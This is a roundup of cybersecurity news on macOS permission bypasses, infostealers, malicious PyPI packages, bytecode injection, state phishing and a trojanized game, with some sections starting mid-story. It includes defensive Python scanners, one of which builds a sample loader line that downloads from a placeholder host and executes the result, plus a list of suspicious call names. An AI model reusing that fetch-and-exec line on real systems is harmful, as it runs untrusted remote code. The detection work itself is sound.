Most apps can run without these entitlements at all; an app that lacks them is simply denied access. Cisco Talos' findings show, however, that malicious actors can inject code into Microsoft's apps and hijack the permissions previously granted to them. An attacker with the right skills can therefore inject code into an application such as Microsoft Teams or Outlook and use the Mac's camera or microphone to record audio or take photos without the user's knowledge.

Cisco Talos reports that Microsoft has acknowledged these security flaws and classified them as low risk. Some of Microsoft's applications, including Teams and OneNote, have been updated to address the library validation problem. Other vulnerable apps, such as Excel, PowerPoint, Word and Outlook, have not yet been fixed.

Security Concerns Raised Over Vulnerabilities in Microsoft Apps for macOS

Recent findings by cybersecurity experts at Cisco Talos have brought to light significant vulnerabilities in popular Microsoft applications for macOS.

These flaws, found in apps such as Outlook, Teams, Word and Excel, have alarmed users and security professionals alike, because they let attackers spy on Mac users by bypassing Apple's security controls. The issue revolves around macOS's Transparency, Consent, and Control (TCC) framework, which is designed to protect users by requiring explicit consent before apps can access sensitive resources such as cameras, microphones or contacts. Cisco Talos researchers found that eight widely used Microsoft apps contained vulnerabilities that could be exploited to bypass TCC.

This means that attackers could leverage the permissions already granted to these apps to spy on users, send unauthorised emails or record video, all without the user's knowledge or consent. The researchers were concerned by Microsoft's decision to disable certain security features, in particular library validation, a safeguard originally intended to prevent unsigned or foreign code from being loaded into an app's process.

By disabling it, Microsoft has effectively circumvented the protections offered by the hardened runtime, exposing users to unnecessary risk. Despite addressing some of the vulnerabilities, Microsoft has not yet resolved the issue across all of its macOS applications, leaving Excel, PowerPoint, Word and Outlook susceptible. This partial response has prompted further concern among security experts, who question the rationale for disabling library validation when there is no clear need for the apps to load additional libraries.
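The combination the researchers object to is visible in an app's entitlements: a hardened-runtime entitlement that lets foreign code into the process sitting next to TCC-gated grants such as camera and microphone. The following is an added example, not code from Cisco Talos or Microsoft, that checks an entitlements plist for that pairing. It assumes the XML plist that `codesign -d --entitlements - --xml <app>` prints on current macOS (older releases prepend a short binary header that must be stripped first); the entitlement keys are Apple's documented ones, and the two sample plists are constructed.

```python
"""Flag macOS app entitlements that let injected code inherit TCC-gated access.

Added example (not Cisco Talos' or Microsoft's code): feed it the XML plist printed by
`codesign -d --entitlements - --xml <app>`; the SAMPLE_* plists below are constructed.
"""
import plistlib

# Hardened-runtime entitlements that allow foreign code into the signed process.
WEAKENING = {
    "com.apple.security.cs.disable-library-validation": "library validation disabled",
    "com.apple.security.cs.allow-dyld-environment-variables": "DYLD_* variables honoured",
    "com.apple.security.cs.allow-unsigned-executable-memory": "unsigned executable memory",
}

# Entitlements whose grants TCC prompts the user for; injected code would ride on them.
SENSITIVE = {
    "com.apple.security.device.camera": "camera",
    "com.apple.security.device.audio-input": "microphone",
    "com.apple.security.personal-information.addressbook": "contacts",
    "com.apple.security.personal-information.location": "location",
    "com.apple.security.personal-information.photos-library": "photos",
    "com.apple.security.automation.apple-events": "Apple Events automation",
}


def assess(entitlements_xml: bytes) -> dict:
    """Parse one app's entitlements and report whether weakening and sensitive grants coincide."""
    ents = plistlib.loads(entitlements_xml)
    weakening = sorted(desc for key, desc in WEAKENING.items() if ents.get(key) is True)
    sensitive = sorted(desc for key, desc in SENSITIVE.items() if ents.get(key) is True)
    return {
        "weakening": weakening,
        "sensitive": sensitive,
        # A loaded dylib only gains something worth stealing when both lists are non-empty.
        "risky": bool(weakening) and bool(sensitive),
    }


def _plist(*keys: str) -> bytes:
    """Build a constructed entitlements plist with every given key set to true."""
    body = "".join(f"    <key>{k}</key>\n    <true/>\n" for k in keys)
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
        '"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
        '<plist version="1.0">\n<dict>\n' + body + "</dict>\n</plist>\n"
    ).encode()


# Constructed samples: the risky pattern, and the same grants behind an intact hardened runtime.
SAMPLE_WEAKENED = _plist(
    "com.apple.security.cs.disable-library-validation",
    "com.apple.security.device.camera",
    "com.apple.security.device.audio-input",
)
SAMPLE_HARDENED = _plist(
    "com.apple.security.device.camera",
    "com.apple.security.device.audio-input",
)


def main() -> None:
    for label, plist in (("weakened", SAMPLE_WEAKENED), ("hardened", SAMPLE_HARDENED)):
        report = assess(plist)
        verdict = "REVIEW" if report["risky"] else "ok"
        print(f"{label}: {verdict} weakening={report['weakening']} sensitive={report['sensitive']}")


if __name__ == "__main__":
    main()
```

The check deliberately does not flag camera or microphone entitlements on their own: those are legitimate for a conferencing app. What warrants review is the pairing with an entitlement that defeats library validation, because that is exactly what lets a planted library run with the app's TCC grants.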

The Cisco Talos team also pointed out that Apple could strengthen the TCC framework itself, for instance by prompting users whenever third-party plugins are loaded into apps that already hold sensitive permissions. Such a prompt would make users aware of unusual or unauthorised activity inside their applications. Given the current state of these vulnerabilities, both Microsoft and Apple may need to take more proactive steps to protect their users.

As digital communication tools play an ever larger role in daily life, robust security measures matter more than ever. In the meantime, Mac users who rely on Microsoft applications should remain vigilant: keeping software up to date and watching for unusual activity helps minimise the risk of exploitation. While the vendors work on strengthening their defences, user awareness and caution remain key.

Hackers Spread Disinformation to undermine Taiwan’s Military

Foreign hackers are increasingly targeting Taiwan by hijacking social media accounts to spread disinformation aimed at undermining the country's military, according to a statement released by the Ministry of Justice Investigation Bureau (MJIB) yesterday.

The hackers, believed to be operating from abroad, are using compromised Internet-connected devices, including surveillance cameras and facial recognition systems, to gain unauthorised access to social media accounts on popular platforms like Dcard and PTT (Professional Technology Temple). By infiltrating these forums, they have been able to post false information that seeks to damage the reputation of Taiwan’s armed forces.

One of the key tactics employed by these cybercriminals is impersonating Taiwanese air force personnel. They have posted misleading content claiming that many military pilots are dissatisfied with their pay and working conditions. Some posts suggest that pilots would rather incur tremendous financial losses than renew their contracts, while others falsely claim that military members are leaving their posts to pursue civilian careers for better work-life balance.

On PTT, an account named “ss900287” further amplified these messages by sharing a link to a photograph that supposedly showed a list of retired military pilots applying for jobs with China Airlines. This, however, is another example of the misinformation being spread to create doubt and discontent among the public regarding Taiwan’s military.

Rise in False Posts Across Social Media

Despite the efforts of the Air Force Command to counteract these false narratives, there has been a noticeable increase in similar disinformation across more than 170 suspicious Facebook groups, including names such as “The Strait Today,” “Commentary by the Commander,” and “You Ban, Me Mad.” These groups are suspected of being part of the coordinated effort to spread misleading content.

Advanced Techniques to Evade Detection

According to the MJIB, the hackers have been able to maintain their disinformation campaign by exploiting vulnerabilities in facial recognition systems, digital cameras, and other networked devices. By stealing personal data and taking over social media accounts, they have managed to pose as legitimate users, making their disinformation appear more credible.

To avoid detection, the hackers have employed sophisticated methods such as data de-identification and rerouting their activities through multiple channels, which has made it difficult to trace their identities and locations. In response, the MJIB has notified social media platforms, requesting that they take action against the groups and users involved in these activities.

The MJIB is advising Taiwanese citizens to strengthen the security of their Internet-connected devices, including by setting strong, unique passwords and updating them regularly to minimise the risk of compromise.

In a related development, fishermen in Penghu County have reported sightings of Chinese fishing boats using fake Taiwanese radar transponder codes in waters near Cimei Township. While these vessels initially appeared to be Taiwanese on radar, visual inspections confirmed their Chinese origin. The Coast Guard Administration has stated that any illegal vessels identified will be expelled from Taiwanese waters.

The reason behind the Chinese fishing boats disguising their transponder codes remains unclear, but it has raised concerns about the potential for further deceptive activities in the region.

New Report Reveals Rising Attacks on macOS Systems

A new report published by Intel471 finds that macOS is increasingly being targeted by threat actors who either develop malware specific to the operating system or use cross-platform languages to reach macOS computers. Separate research also points to a growing number of exploited macOS vulnerabilities. Such malware and exploits are used both to commit cybercrime and to spy on individuals and businesses.

According to that separate research, the number of macOS vulnerabilities exploited in 2023 increased by more than 30% compared with 2022. The Software Vulnerability Ratings Report 2024, issued by patch management vendor Action1, highlights several other issues, including that Microsoft Office programs are becoming easier to exploit and that attackers are increasingly attacking load balancers such as NGINX and Citrix.

Action1 analysts drew five insights into the 2022 to 2023 threat landscape from data in the National Vulnerability Database (NVD) and CVEdetails.com. The NVD has seen a significant slowdown in maintenance activity since February, as a large backlog of software and hardware flaws submitted to the National Institute of Standards and Technology (NIST) awaits processing.

NIST has attributed the slowdown to the fact that "the amount of software has increased and, therefore, so has the number of vulnerabilities as well as interagency support has changed." Intel471, for its part, observed that between January 2023 and July 2024 more than 40 threat actors attacked macOS systems with a variety of malware types, most commonly infostealers and trojans.

In recent years, information-stealing malware, or infostealers, has become increasingly widespread across all operating systems, and macOS is no exception. Cloud security company Uptycs reported that infostealer incidents doubled in the first quarter of 2023 compared with the same period of the previous year, and Group-IB reported that underground sales of macOS infostealers have increased fivefold over the last five years.

Cybercriminals use this software to steal login credentials, session cookies that allow authentication without credentials, and even more sensitive data such as credit card details or cryptocurrency wallet information. Many groups also use infostealers to harvest legitimate credentials, which they sell to other criminals, most of whom buy credentials belonging to companies rather than individuals. Atomic Stealer, also known as Atomic macOS Stealer or AMOS, has been one of the most prevalent macOS infostealers since 2023.

It targets macOS devices and browsers to steal credentials and cryptocurrency wallet data. Several other macOS infostealers are operated by cybercriminals or advertised on underground forums. A threat actor using the handle Code Hex advertised a macOS infostealer known as ShadowVault, which can steal data from multiple Chromium-based browsers, files stored on compromised computers, and Bitcoin wallets.

The fact that many spyware providers have sold their services to state-sponsored threat actors does not mean those actors do not develop their own macOS malware and tools. North Korean threat actor BlueNoroff, for example, has developed a malware loader known as RustBucket specifically for macOS, targeting financial institutions involved in cryptocurrency-related activities.

Russian threat actors APT28, part of the Main Directorate of the General Staff of the Armed Forces, and APT29, part of the Foreign Intelligence Service, have also used macOS malware. APT29 used the Empire cross-platform remote administration and post-exploitation framework, which, although no longer maintained, allowed macOS to be targeted.

Vietnam-based threat actor APT32 also deployed a macOS backdoor against a range of organisations. The perception that macOS is safer is reinforced by the relatively smaller amount of macOS-specific malware compared with Windows, which can make it an easier target. Among the threat actors identified in the report, more than 40 actively target macOS, and more than 20 are actively trying to acquire malware crafted specifically for it.

They do so in several ways, including purchasing existing malware and commissioning new malware. The focus on infostealers, which steal login credentials, session cookies and credit card numbers, highlights an immediate threat to consumers and businesses alike. Independent research confirms the trend: security researcher Patrick Wardle reported a doubling of new macOS malware in 2023 compared with the previous year.


Group-IB likewise reported a fivefold increase in underground sales of macOS infostealers. In the short term, infostealers and RATs are expected to remain the most prevalent threats to macOS users, while the increasing presence of ransomware and other malware families suggests a growing sophistication and diversification of threats.

This trend, coupled with the growing number of threat actors targeting macOS, calls for heightened vigilance and proactive security measures. The report concludes with a stark warning: despite the perceived security of Apple products, macOS users should remain alert to these threats. The growing sophistication of the malware and the number of actors seeking to exploit the macOS ecosystem underscore the need for robust security measures, including reputable antivirus software, regular software updates and strong passwords. macOS systems must be kept up to date and patched to avoid exposure to common vulnerabilities.

Security software should be deployed on systems to detect malware and suspicious activity. Email security solutions should also be used, as many initial breaches are spread via phishing emails. Finally, all employees need to be trained to spot potential social engineering techniques used in emails or instant messaging tools.

Massive Data Breach Exposes Social Security Numbers of 2.9 Billion People

A significant data breach has reportedly compromised the personal information of 2.9 billion people, potentially affecting the majority of Americans. A hacking group known as USDoD claims to have stolen this data, which includes highly sensitive information such as Social Security numbers, full names, addresses, dates of birth, and phone numbers. This development has raised alarm due to the vast scope of the breach and the critical nature of the information involved. The breach was first reported by the Los Angeles Times, which revealed that the hacker group is offering the stolen data for sale. 

The breach allegedly stems from National Public Data, a company that collects and stores personal information to facilitate background checks. The company has not formally confirmed the breach but did acknowledge purging its entire database. According to National Public Data, they have deleted all non-public information, although they stopped short of admitting that the data had been compromised. In April, the hacking group USDoD claimed responsibility for the breach, stating that it had obtained the personal information of billions of people. This led to a class-action lawsuit against National Public Data, as victims sought redress for the potential misuse of their sensitive information. 

The lawsuit has intensified scrutiny on the company’s data security practices, particularly given the critical nature of the information it manages. The potential consequences of this breach are severe. The stolen data, which includes Social Security numbers, could be used for a variety of malicious activities, including identity theft, fraud, and other forms of cybercrime. The scale of the breach also highlights the ongoing challenges in safeguarding personal information, particularly when it is collected and stored by third-party companies. As investigations continue, the breach underscores the urgent need for stronger data protection measures. 

Companies that handle sensitive information must ensure that they have robust security protocols in place to prevent such incidents. The breach also raises questions about the transparency and responsibility of organizations when dealing with personal data. In the meantime, consumers and businesses are on high alert, awaiting further developments and the potential fallout from one of the largest data breaches in history. The incident serves as a stark reminder of the risks associated with data storage and the critical importance of cybersecurity.

Hackers Spreading Malicious Python Packages Through Popular Developer Q&A Platform

The malware hidden within the package functioned as a comprehensive information stealer, targeting a wide range of data. This included web browser passwords, cookies, credit card details, cryptocurrency wallets, and information from messaging apps like Telegram, Signal, and Session.

Additionally, it had features to capture screenshots and search for files containing GitHub recovery codes and BitLocker keys. The collected information was then compressed and sent to two Telegram bots controlled by the attacker.

The malware also included a backdoor component, giving the attacker persistent remote access to the victims' machines, enabling further exploits and long-term control.

The attack chain involved multiple stages, with the "raydium" package listing "spl-types" as a dependency to disguise its malicious behavior and appear legitimate to users.

A notable aspect of this campaign was the use of Stack Exchange as a vector for distribution. The attacker posted seemingly helpful answers to developer questions about performing swap transactions in Raydium using Python, referencing the malicious package. By choosing high-visibility threads with thousands of views, the attacker maximized the package's reach and credibility.

Although the original Stack Exchange post has been removed, The Hacker News found references to "raydium" in an unanswered question posted on July 9, 2024, where a user struggled to run a swap on the Solana network using Python 3.10.2 with Raydium. Additionally, "raydium-sdk" was mentioned in a Medium post titled "How to Buy and Sell Tokens on Raydium using Python: A Step-by-Step Solana Guide" by a user named SolanaScribe on June 29, 2024.

The exact removal date of these packages from PyPI is unclear. Users have recently sought help on the Medium post about installing "raydium-sdk" as late as July 27, 2024. Checkmarx confirmed that the Medium post was not created by the threat actor.

This method of malware distribution is not new. In May, Sonatype exposed a similar scheme where the package pytoileur was promoted on Stack Overflow to facilitate cryptocurrency theft. This trend demonstrates how attackers exploit the trust in community-driven platforms to conduct large-scale supply chain attacks.

"A single compromised developer can inadvertently introduce vulnerabilities into an entire company's software ecosystem, potentially affecting the whole corporate network," the researchers stated. "This attack is a wake-up call for individuals and organizations to reassess their security strategies."

In a related development, Fortinet FortiGuard Labs reported on a malicious PyPI package named zlibxjson, designed to steal sensitive information such as Discord tokens, browser cookies from Chrome, Firefox, Brave, and Opera, and stored passwords. This package had 602 downloads before it was removed from PyPI.

"These actions can lead to unauthorized access to user accounts and the exfiltration of personal data, clearly classifying the software as malicious," said security researcher Jenna Wang.

Hackers Exploit Bytecode Interpreters to Inject Malicious Code

Attackers can conceal the execution of malicious code by embedding commands in the bytecode that software interpreters for languages such as VBScript and Python hold in memory. The technique will be demonstrated by a group of Japanese researchers at next week's Black Hat USA conference.

Interpreters convert human-readable software code into bytecode, which are detailed programming instructions that the underlying virtual machine can understand. The research team managed to insert malicious instructions into the bytecode held in memory before execution. Since most security software does not scan bytecode, their changes went undetected. 

This method could enable attackers to hide their malicious activities from most endpoint security software. Researchers from NTT Security Holdings Corp. and the University of Tokyo will showcase this capability using the VBScript interpreter, says Toshinori Usui, a research scientist at NTT Security. The researchers have confirmed that the technique also works for inserting malicious code into the in-memory processes of both the Python and Lua interpreters.

"Malware often hides its behavior by injecting malicious code into benign processes, but existing injection-type attacks have characteristic behaviors ... which are easily detected by security products," Usui says. "The interpreter does not care about overwriting by a remote process, so we can easily replace generated bytecode with our malicious code — it's that feature we exploit."

Bytecode attacks are not entirely new, though they remain uncommon. In 2018, researchers from the University of California at Irvine published a paper introducing bytecode attacks and defenses. Last year, the administrators of the Python Package Index (PyPI) removed a malicious package known as fshec2, which escaped initial detection because its malicious code was compiled as bytecode. Python caches compiled bytecode in PYC files, which the Python interpreter can execute directly.

"This may be the first supply chain attack to leverage the fact that Python bytecode (PYC) files can be directly executed, and it comes amid a spike in malicious submissions to the Python Package Index," Karlo Zanki, a reverse engineer at ReversingLabs, said in a June 2023 analysis of the incident. "If so, it poses yet another supply chain risk going forward, since this type of attack is likely to be missed by most security tools, which only scan Python source code (PY) files."
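The gap Zanki describes is mechanical: a PYC file is a 16-byte header (magic number, flags, source timestamp or hash, source size) followed by a marshalled code object, and a scanner that only reads `.py` files never sees what it references. The following added example, which is not ReversingLabs' or PyPI's tooling, walks a package archive, flags every `.pyc` that has no matching `.py` beside it or in the corresponding `__pycache__` layout, and lists the names such bytecode-only modules reference. The archive it scans is constructed in `build_sample_archive` to stand in for a wheel, and `SUSPICIOUS_NAMES` is an assumed starting list rather than a vetted indicator set.

```python
"""Flag bytecode-only modules in a Python package archive and inspect what they reference.

Added example, not ReversingLabs' or PyPI's tooling: `build_sample_archive` constructs a
zip standing in for a wheel; the SUSPICIOUS_NAMES list is an assumed starting point.
"""
from __future__ import annotations

import importlib.util
import io
import marshal
import posixpath
import re
import types
import zipfile

# Names whose presence in a module shipped without source warrants review (assumed list).
SUSPICIOUS_NAMES = {"exec", "eval", "compile", "b64decode", "urlopen", "Popen", "system"}


def make_pyc(source: str, filename: str) -> bytes:
    """Build a .pyc image the way CPython does: 16-byte header plus the marshalled code object."""
    code = compile(source, filename, "exec")
    header = importlib.util.MAGIC_NUMBER + b"\x00" * 12  # flags, mtime, source size
    return header + marshal.dumps(code)


def names_in_code(code: types.CodeType) -> set[str]:
    """Collect every global/attribute name referenced, recursing into nested code objects."""
    found = set(code.co_names)
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            found |= names_in_code(const)
    return found


def source_path_for(pyc_path: str) -> str:
    """Map pkg/__pycache__/mod.cpython-311.pyc or pkg/mod.pyc to the source pkg/mod.py."""
    directory, name = posixpath.split(pyc_path)
    if posixpath.basename(directory) == "__pycache__":
        directory = posixpath.dirname(directory)
    stem = re.sub(r"(\.[^.]+)?\.pyc$", "", name)
    return posixpath.join(directory, stem + ".py")


def scan_archive(archive: bytes) -> list[dict]:
    """Return one finding per .pyc member that has no matching .py in the same archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        members = set(zf.namelist())
        for member in sorted(members):
            if not member.endswith(".pyc"):
                continue
            source = source_path_for(member)
            if source in members:
                continue  # cached bytecode next to its source; source scanners will see it
            data = zf.read(member)
            finding = {"pyc": member, "expected_source": source,
                       "magic_ok": data[:4] == importlib.util.MAGIC_NUMBER, "names": set()}
            if finding["magic_ok"]:
                try:
                    finding["names"] = names_in_code(marshal.loads(data[16:])) & SUSPICIOUS_NAMES
                except (ValueError, EOFError, TypeError):
                    pass  # unreadable marshal data is itself worth a manual look
            findings.append(finding)
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: source modules, a legitimate __pycache__ entry, and one PYC-only loader."""
    util_src = "def add(a, b):\n    return a + b\n"
    loader_src = (
        "import base64, urllib.request\n"
        "exec(base64.b64decode(urllib.request.urlopen('http://example.invalid/p').read()))\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pkg/__init__.py", "from . import helper\n")
        zf.writestr("pkg/util.py", util_src)
        zf.writestr("pkg/__pycache__/util.cpython-311.pyc", make_pyc(util_src, "util.py"))
        zf.writestr("pkg/helper.pyc", make_pyc(loader_src, "helper.py"))  # no helper.py anywhere
    return buf.getvalue()


def main() -> None:
    for f in scan_archive(build_sample_archive()):
        print(f"{f['pyc']}: no {f['expected_source']}; references {sorted(f['names'])}")


if __name__ == "__main__":
    main()
```

The marshal format is specific to the interpreter version that produced it, so the scanner compares the magic number against its own `importlib.util.MAGIC_NUMBER` and only unmarshals on a match; in practice the check is run under each Python version the package claims to support. Note that the legitimate `__pycache__` entry is not reported because its source is present, which is what separates a normal build artefact from a module whose only form is bytecode.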

Beyond Precompiled Malware

After an initial compromise, attackers have several options to extend their control over a targeted system: They can perform reconnaissance, attempt further system compromise using malware, or use existing tools on the system — a strategy known as "living off the land."

The NTT researchers' bytecode attack technique falls into the last category. Instead of shipping pre-compiled bytecode files, their attack, called Bytecode Jiu-Jitsu, injects malicious bytecode into the memory space of a running interpreter. Since most security tools do not inspect bytecode in memory, the attack conceals the malicious commands from detection.

This approach lets attackers avoid other, more obviously malicious steps, such as calling suspicious APIs to create threads, allocating executable memory, and modifying instruction pointers, Usui explains.

"While native code has instructions directly executed by the CPU, bytecode is just data to the CPU and is interpreted and executed by the interpreter," he says. "Therefore, unlike native code, bytecode does not require execution privilege, [and our technique] does not need to prepare a memory region with execution privilege."

Improving Interpreter Defenses

Interpreter developers, security tool developers, and operating system architects can all help mitigate this problem. Although bytecode attacks exploit not vulnerabilities in interpreters but the way interpreters execute code, certain security measures, such as pointer checksums, could reduce the risk, according to the UC Irvine paper.

The NTT Security researchers noted that checksum defenses would likely be ineffective against their techniques and recommend that developers enforce write protections to mitigate the risk. "The ultimate countermeasure is to restrict the memory write to the interpreter," Usui says.

Presenting a new attack technique aims to show security researchers and defenders what could be possible, not to inform attackers' strategies, Usui emphasizes. "Our goal is not to abuse defensive tactics, but to ultimately be an alarm bell for security researchers around the world," he says.

Inside the Espionage: How Nobelium Targets French Diplomatic Staff

Cybersecurity threats have become increasingly sophisticated, and state-sponsored actors continue to target government institutions and diplomatic entities. One such incident involves a Russian threat actor known as “Nobelium,” which has been launching spear phishing attacks against French diplomats.

ANSSI Issued an Alert

France's cybersecurity agency, ANSSI, has issued a notice outlining a Russian spear phishing attempt aimed at French diplomats, The Record reports. The CIA connects the campaign to "Nobelium," a threat actor linked to Russia's Foreign Intelligence Service (SVR).

The Campaign

Nobelium, believed to have ties to Russia’s Foreign Intelligence Service (the SVR), primarily uses compromised legitimate email accounts belonging to diplomatic staff to conduct these attacks. The goal is to exfiltrate valuable intelligence and gain insights into French diplomatic activities.

Compromising Email Accounts of French Ministers

The incidents included the compromise of email accounts at the French Ministry of Culture and the National Agency for Territorial Cohesion, but according to ANSSI, the hackers were unable to access any part of those networks beyond the compromised inboxes.

However, the hackers subsequently used those email addresses to target other organizations, including France's Ministry of Foreign Affairs. ANSSI stated that Nobelium attempted to gain remote access to the network by installing Cobalt Strike, a penetration testing framework infamous for being abused by bad actors, but was unsuccessful.

Other incidents reported by ANSSI included the use of a French diplomat's stolen email account to send a malicious message falsely announcing the closure of the French Embassy in South Africa due to an alleged terrorist attack.

Tactics and Techniques

Nobelium’s spear phishing campaigns are highly targeted. They craft convincing lure documents tailored to specific individuals within diplomatic institutions, embassies, and consulates. Here are some tactics and techniques they employ:

Email Spoofing: Nobelium impersonates trusted senders, often using official-looking email addresses. This makes it challenging for recipients to discern the malicious intent.

Lure Documents: The threat actor attaches seemingly innocuous files (such as PDFs or Word documents) to their emails. These files contain hidden malware or exploit vulnerabilities in software applications.

Social Engineering: Nobelium leverages social engineering techniques to manipulate recipients into opening the attachments. They might use urgent language, reference official matters, or create a sense of curiosity.

Credential Harvesting: Once the recipient opens the attachment, the malware may attempt to steal login credentials or gain unauthorized access to sensitive systems.

The Growing Threat of Data Breaches to Australian Businesses


Data breaches are now a significant threat to Australian businesses, posing the risk of "irreversible brand damage." A cybersecurity expert from Fortinet, a global leader in the field, has raised alarms about cybercriminals increasingly targeting the nation’s critical infrastructure. Cybercriminals are continually finding new ways to infiltrate Australia’s infrastructure, making businesses highly vulnerable to attacks. 

The Australian federal government has identified 11 critical sectors under the Security of Critical Infrastructure Act, which was amended in 2018 to enforce stricter regulations. Businesses in these sectors are required to complete annual reporting to notify the federal government of any attempts to access their networks. Michael Murphy, Fortinet’s Head of Operational Technology and Critical Infrastructure, recently discussed the severity of cyber threats on Sky News Business Weekend. During the 2022-2023 financial year, 188 cybersecurity incidents were reported across critical sectors, highlighting ongoing risks to national networks like water and energy supplies. 

Additionally, the Australian Bureau of Statistics found that 34 percent of businesses experienced resource losses managing cybersecurity attacks in the 2021-2022 financial year, and 22 percent of Australian businesses faced a cybersecurity attack during that period—more than double the previous year’s figure. Even small businesses are now vulnerable to cybercrime. Murphy pointed out that among entities with mandatory reporting, 188 incidents were reported, with 142 incidents reported by entities outside of critical infrastructure, demonstrating the widespread nature of the threat. He explained that hackers are motivated by various factors beyond financial gain, including the desire for control. 

The consequences of cyber attacks can be severe, disrupting systems and causing significant downtime, which leads to revenue loss and irreversible brand damage. Critical infrastructure sectors face unique challenges compared to the IT enterprise. Quick restoration of systems is often not an option, and recovery can take considerable time. This extended downtime not only affects revenue but also damages the reputation and trustworthiness of the affected organizations. Murphy noted that many incidents are driven by motives such as financial profiteering, socio-political influence, or simply the desire of hackers and syndicates to boost their credibility. 

As cyber threats evolve, it is crucial for businesses, especially those in critical infrastructure sectors, to strengthen their cybersecurity measures. While annual reporting and adherence to federal regulations are essential, proactive strategies and advanced security technologies are necessary to mitigate risks effectively.

Hackers Use Trojanized Minesweeper Clone to Phish Financial Organizations


Hackers are exploiting code from a Python clone of Microsoft's classic Minesweeper game to conceal malicious scripts in attacks targeting financial institutions in Europe and the US.

Ukraine's CSIRT-NBU and CERT-UA have identified the threat actor 'UAC-0188' as responsible for these attacks. They are using the legitimate game code to hide Python scripts that download and install the SuperOps RMM (Remote Monitoring and Management) software. SuperOps RMM, though legitimate, provides remote actors with direct access to compromised systems.

CERT-UA's investigation into the initial discovery has uncovered at least five breaches in financial and insurance sectors across Europe and the United States linked to these same files.

The attack begins with an email from "support@patient-docs-mail.com," posing as a medical center with the subject "Personal Web Archive of Medical Documents." The email prompts recipients to download a 33MB .SCR file from a Dropbox link. This file includes harmless code from a Python clone of Minesweeper, alongside malicious Python code designed to download additional scripts from a remote source, "anotepad.com."

Incorporating Minesweeper code within the executable helps disguise the 28MB base64-encoded string containing the malicious code, making it seem benign to security software. The Minesweeper code features a function named "create_license_ver," repurposed to decode and execute the hidden malicious code, using legitimate software components to mask and facilitate the attack.

The base64 string decodes to a ZIP file containing an MSI installer for SuperOps RMM, which is extracted and executed using a static password. While SuperOps RMM is a legitimate tool, in this scenario, it grants attackers unauthorized access to the victim's computer.
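A triage check for the embedding technique described above, added here as an example and not CERT-UA's tooling: it parses Python source (as recovered from such a package) and flags large string literals that base64-decode to a ZIP archive, listing the members without executing anything. The sample script and its "installer.msi" member are constructed for the demonstration.

```python
import ast
import base64
import binascii
import io
import zipfile
from typing import List, Tuple

ZIP_MAGIC = b"PK\x03\x04"

def suspicious_blobs(source: str, min_len: int = 256) -> List[Tuple[int, int, List[str]]]:
    """Large string literals that base64-decode to a ZIP archive.
    Returns (line number, encoded length, archive member names) per hit."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        text = node.value.strip()
        if len(text) < min_len:
            continue
        try:
            raw = base64.b64decode(text, validate=True)
        except binascii.Error:
            continue                      # not base64 at all
        if not raw.startswith(ZIP_MAGIC):
            continue                      # base64, but not a ZIP container
        try:
            names = zipfile.ZipFile(io.BytesIO(raw)).namelist()
        except zipfile.BadZipFile:
            names = ["<truncated or damaged archive>"]
        hits.append((node.lineno, len(text), names))
    return hits

def build_sample() -> str:
    """Constructed stand-in for the trojanized script: a harmless game function
    next to a literal that decodes to a ZIP holding an installer-named member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("installer.msi", b"placeholder, not a real installer " * 16)
    blob = base64.b64encode(buf.getvalue()).decode()
    return (
        "def reveal_cell(board, x, y):\n"
        "    return board[y][x]\n\n"
        f"PAYLOAD = '{blob}'\n"
    )
```

Running suspicious_blobs(build_sample()) reports the literal on line 4 of the sample with its member list; a real sample would show the MSI name from inside the archive, which is the cue to hand the file to a sandbox rather than run it.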

CERT-UA advises organizations that do not use SuperOps RMM to treat its presence, or related network activity such as connections to "superops.com" or "superops.ai" domains, as an indicator of compromise.

The agency has also provided additional indicators of compromise (IoCs) associated with this attack at the end of their report.